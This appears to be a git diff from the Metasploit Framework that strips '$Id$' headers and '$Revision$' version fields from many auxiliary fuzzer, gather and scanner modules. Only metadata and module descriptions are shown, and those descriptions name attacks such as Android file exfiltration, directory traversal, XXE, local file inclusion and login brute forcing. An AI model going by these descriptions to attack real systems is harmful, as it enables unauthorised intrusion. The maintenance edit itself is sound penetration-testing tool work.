-1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of malformed TDS login requests. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index 14bdc02400..84aaed0623 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of malformed TDS login requests. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb index cb4e8c41ec..a58865133c 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb index 7e81de3333..c4111158a8 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index e373682bad..6e374cc4f4 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Android Content Provider File Disclosure', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a cross-domain issue within the Android web browser to exfiltrate files from a vulnerable device. @@ -29,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary 'Thomas Cannon', # Original discovery, partial disclsoure 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index 26a965e622..f2b4785c64 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary a published list of applications. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ], diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 36b7214d63..7017a78c4a 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary Metaframe ICA server. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '50617' ], diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index 43df04d3d7..5dab9a5166 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'K. Reid Wightman ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012' )) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 2b6afd7346..0071faeb08 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Carlos Perez ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '1999-0532'], diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb index 4a7e45e195..30a7082f26 100644 --- a/modules/auxiliary/gather/search_email_collector.rb +++ b/modules/auxiliary/gather/search_email_collector.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,8 +19,7 @@ class Metasploit3 < Msf::Auxiliary valid email addresses for the target domain. }, 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 72390fd562..97ed6a9dd3 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0836' ], diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index 1bbdea978e..1c0fc8fa30 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Energizer DUO Trojan Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index 113317b473..3fce5293b6 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DB2 Authentication Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.}, diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 9fae3e946a..f2689b9183 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DB2 Probe Utility', - 'Version' => '$Revision$', 'Description' => 'This module queries a DB2 instance information.', 'Author' => ['todb'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 89483537d1..4a339f3919 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DB2 Discovery Service Detection', - 'Version' => '$Revision$', 'Description' => 'This module simply queries the DB2 discovery service for information.', 'Author' => [ 'MC' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index 50a47887dd..8d712798aa 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Endpoint Mapper Service Discovery', - 'Version' => '$Revision$', 'Description' => %q{ This module can be used to obtain information from the Endpoint Mapper service. diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 36e96c4822..848044404a 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Hidden DCERPC Service Discovery', - 'Version' => '$Revision$', 'Description' => %q{ This module will query the endpoint mapper and make a list of all ncacn_tcp RPC services. It will then connect to each of diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 5288d190ba..7a2a9706a1 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Remote Management Interface Discovery', - 'Version' => '$Revision$', 'Description' => %q{ This module can be used to obtain information from the Remote Management Interface DCERPC service. diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 81fff149c1..3f06afc98a 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DCERPC TCP Service Auditor', - 'Version' => '$Revision$', 'Description' => 'Determine what DCERPC services are accessible over a TCP port', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index ccfee42bd4..7abf63f889 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DECT Call Scanner', - 'Version' => '$Revision$', 'Description' => 'This module scans for active DECT calls', 'Author' => [ 'DK ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index 1ee1c68acc..c4daf84971 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DECT Base Station Scanner', - 'Version' => '$Revision$', 'Description' => 'This module scans for DECT base stations', 'Author' => [ 'DK ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 73f626da2e..5b1e584ed4 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ARP Sweep Local Network Discovery', - 'Version' => '$Revision$', 'Description' => %q{ Enumerate alive Hosts in local network using ARP requests. }, diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index bc32a33858..e36abc0759 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -13,7 +13,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Link Local/Node Local Ping Discovery', - 'Version' => '$Revision$', 'Description' => %q{ Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds. }, diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 6af11951a5..d3d3b7fc38 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Local Neighbor Discovery', - 'Version' => '$Revision$', 'Description' => %q{ Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address. Note, that like ARP scanning, this usually cannot be performed beyond the local diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 229bc85b38..3f5814e864 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -12,7 +8,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Local Neighbor Discovery Using Router Advertisement', - 'Version' => '$Revision$', 'Description' => %q{ Send a spoofed router advertisement with high priority to force hosts to start the IPv6 address auto-config. Monitor for IPv6 host advertisements, diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 71649a12a2..4984ee4d19 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'UDP Service Prober', - 'Version' => '$Revision$', 'Description' => 'Detect common UDP services using sequential probes', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index 7ac5b1c0c3..8c73f06838 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'UDP Service Sweeper', - 'Version' => '$Revision$', 'Description' => 'Detect interesting UDP services', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 9300392820..7674e267ca 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'EMC AlphaStor Device Manager Service', - 'Version' => '$Revision$', 'Description' => 'This module queries the remote host for the EMC Alphastor Device Management Service.', 'Author' => 'MC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 3cef16c0aa..c8cf804145 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'EMC AlphaStor Library Manager Service', - 'Version' => '$Revision$', 'Description' => 'This module queries the remote host for the EMC Alphastor Library Management Service.', 'Author' => 'MC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index 2b8047a156..0f959b41de 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Finger Service User Enumerator', - 'Version' => '$Revision$', 'Description' => 'Identify valid users through the finger service using a variety of tricks', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 308f9e287d..65f162e2a5 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Anonymous FTP Access Detection', - 'Version' => '$Revision$', 'Description' => 'Detect anonymous (read/write) FTP server access.', 'References' => [ diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 0dd756de27..638fa072fb 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index 78ac32a09e..19084ff194 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect FTP Version.', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 46996d1f8f..e5132ba851 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'H.323 Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect H.323 Version.', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index a0bd89d9c0..7e923e84d8 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Adobe XML External Entity Injection', - 'Version' => '$Revision$', 'Description' => %q{ Multiple Adobe Products -- XML External Entity Injection. Affected Sofware: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 6aec8cad4f..f65e278997 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache "mod_userdir" User Enumeration', - 'Version' => '$Revision$', 'Description' => %q{Apache with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 3d479efee3..5226c8f967 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index 10ed923407..57734b0e60 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Axis2 v1.4.1 Local File Inclusion', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index a6748b4452..8607eb1db3 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Axis2 v1.4.1 Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{This module attempts to login to an Apache Axis2 v1.4.1 instance using username and password combindations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index 9e252f2b4c..2aec802d2b 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index 59785ccd78..89bc219d42 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Barracuda Multiple Product "locale" Directory Traversal', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a directory traversal vulnerability present in serveral Barracuda products, including the Barracuda Spam and Virus Firewall, diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index b9ce76ec5a..10ff301f72 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary in GET/POST Query parameters values. }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index 731f417f92..df22ba26e7 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index c9bfe79e2c..d240995b6a 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP SSL Certificate Checker', - 'Version' => '$Revision$', 'Author' => 'nebulus', 'License' => MSF_LICENSE, 'Description' => %q{ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 70bfe3f04d..fd57fda9bb 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '1846'], diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb 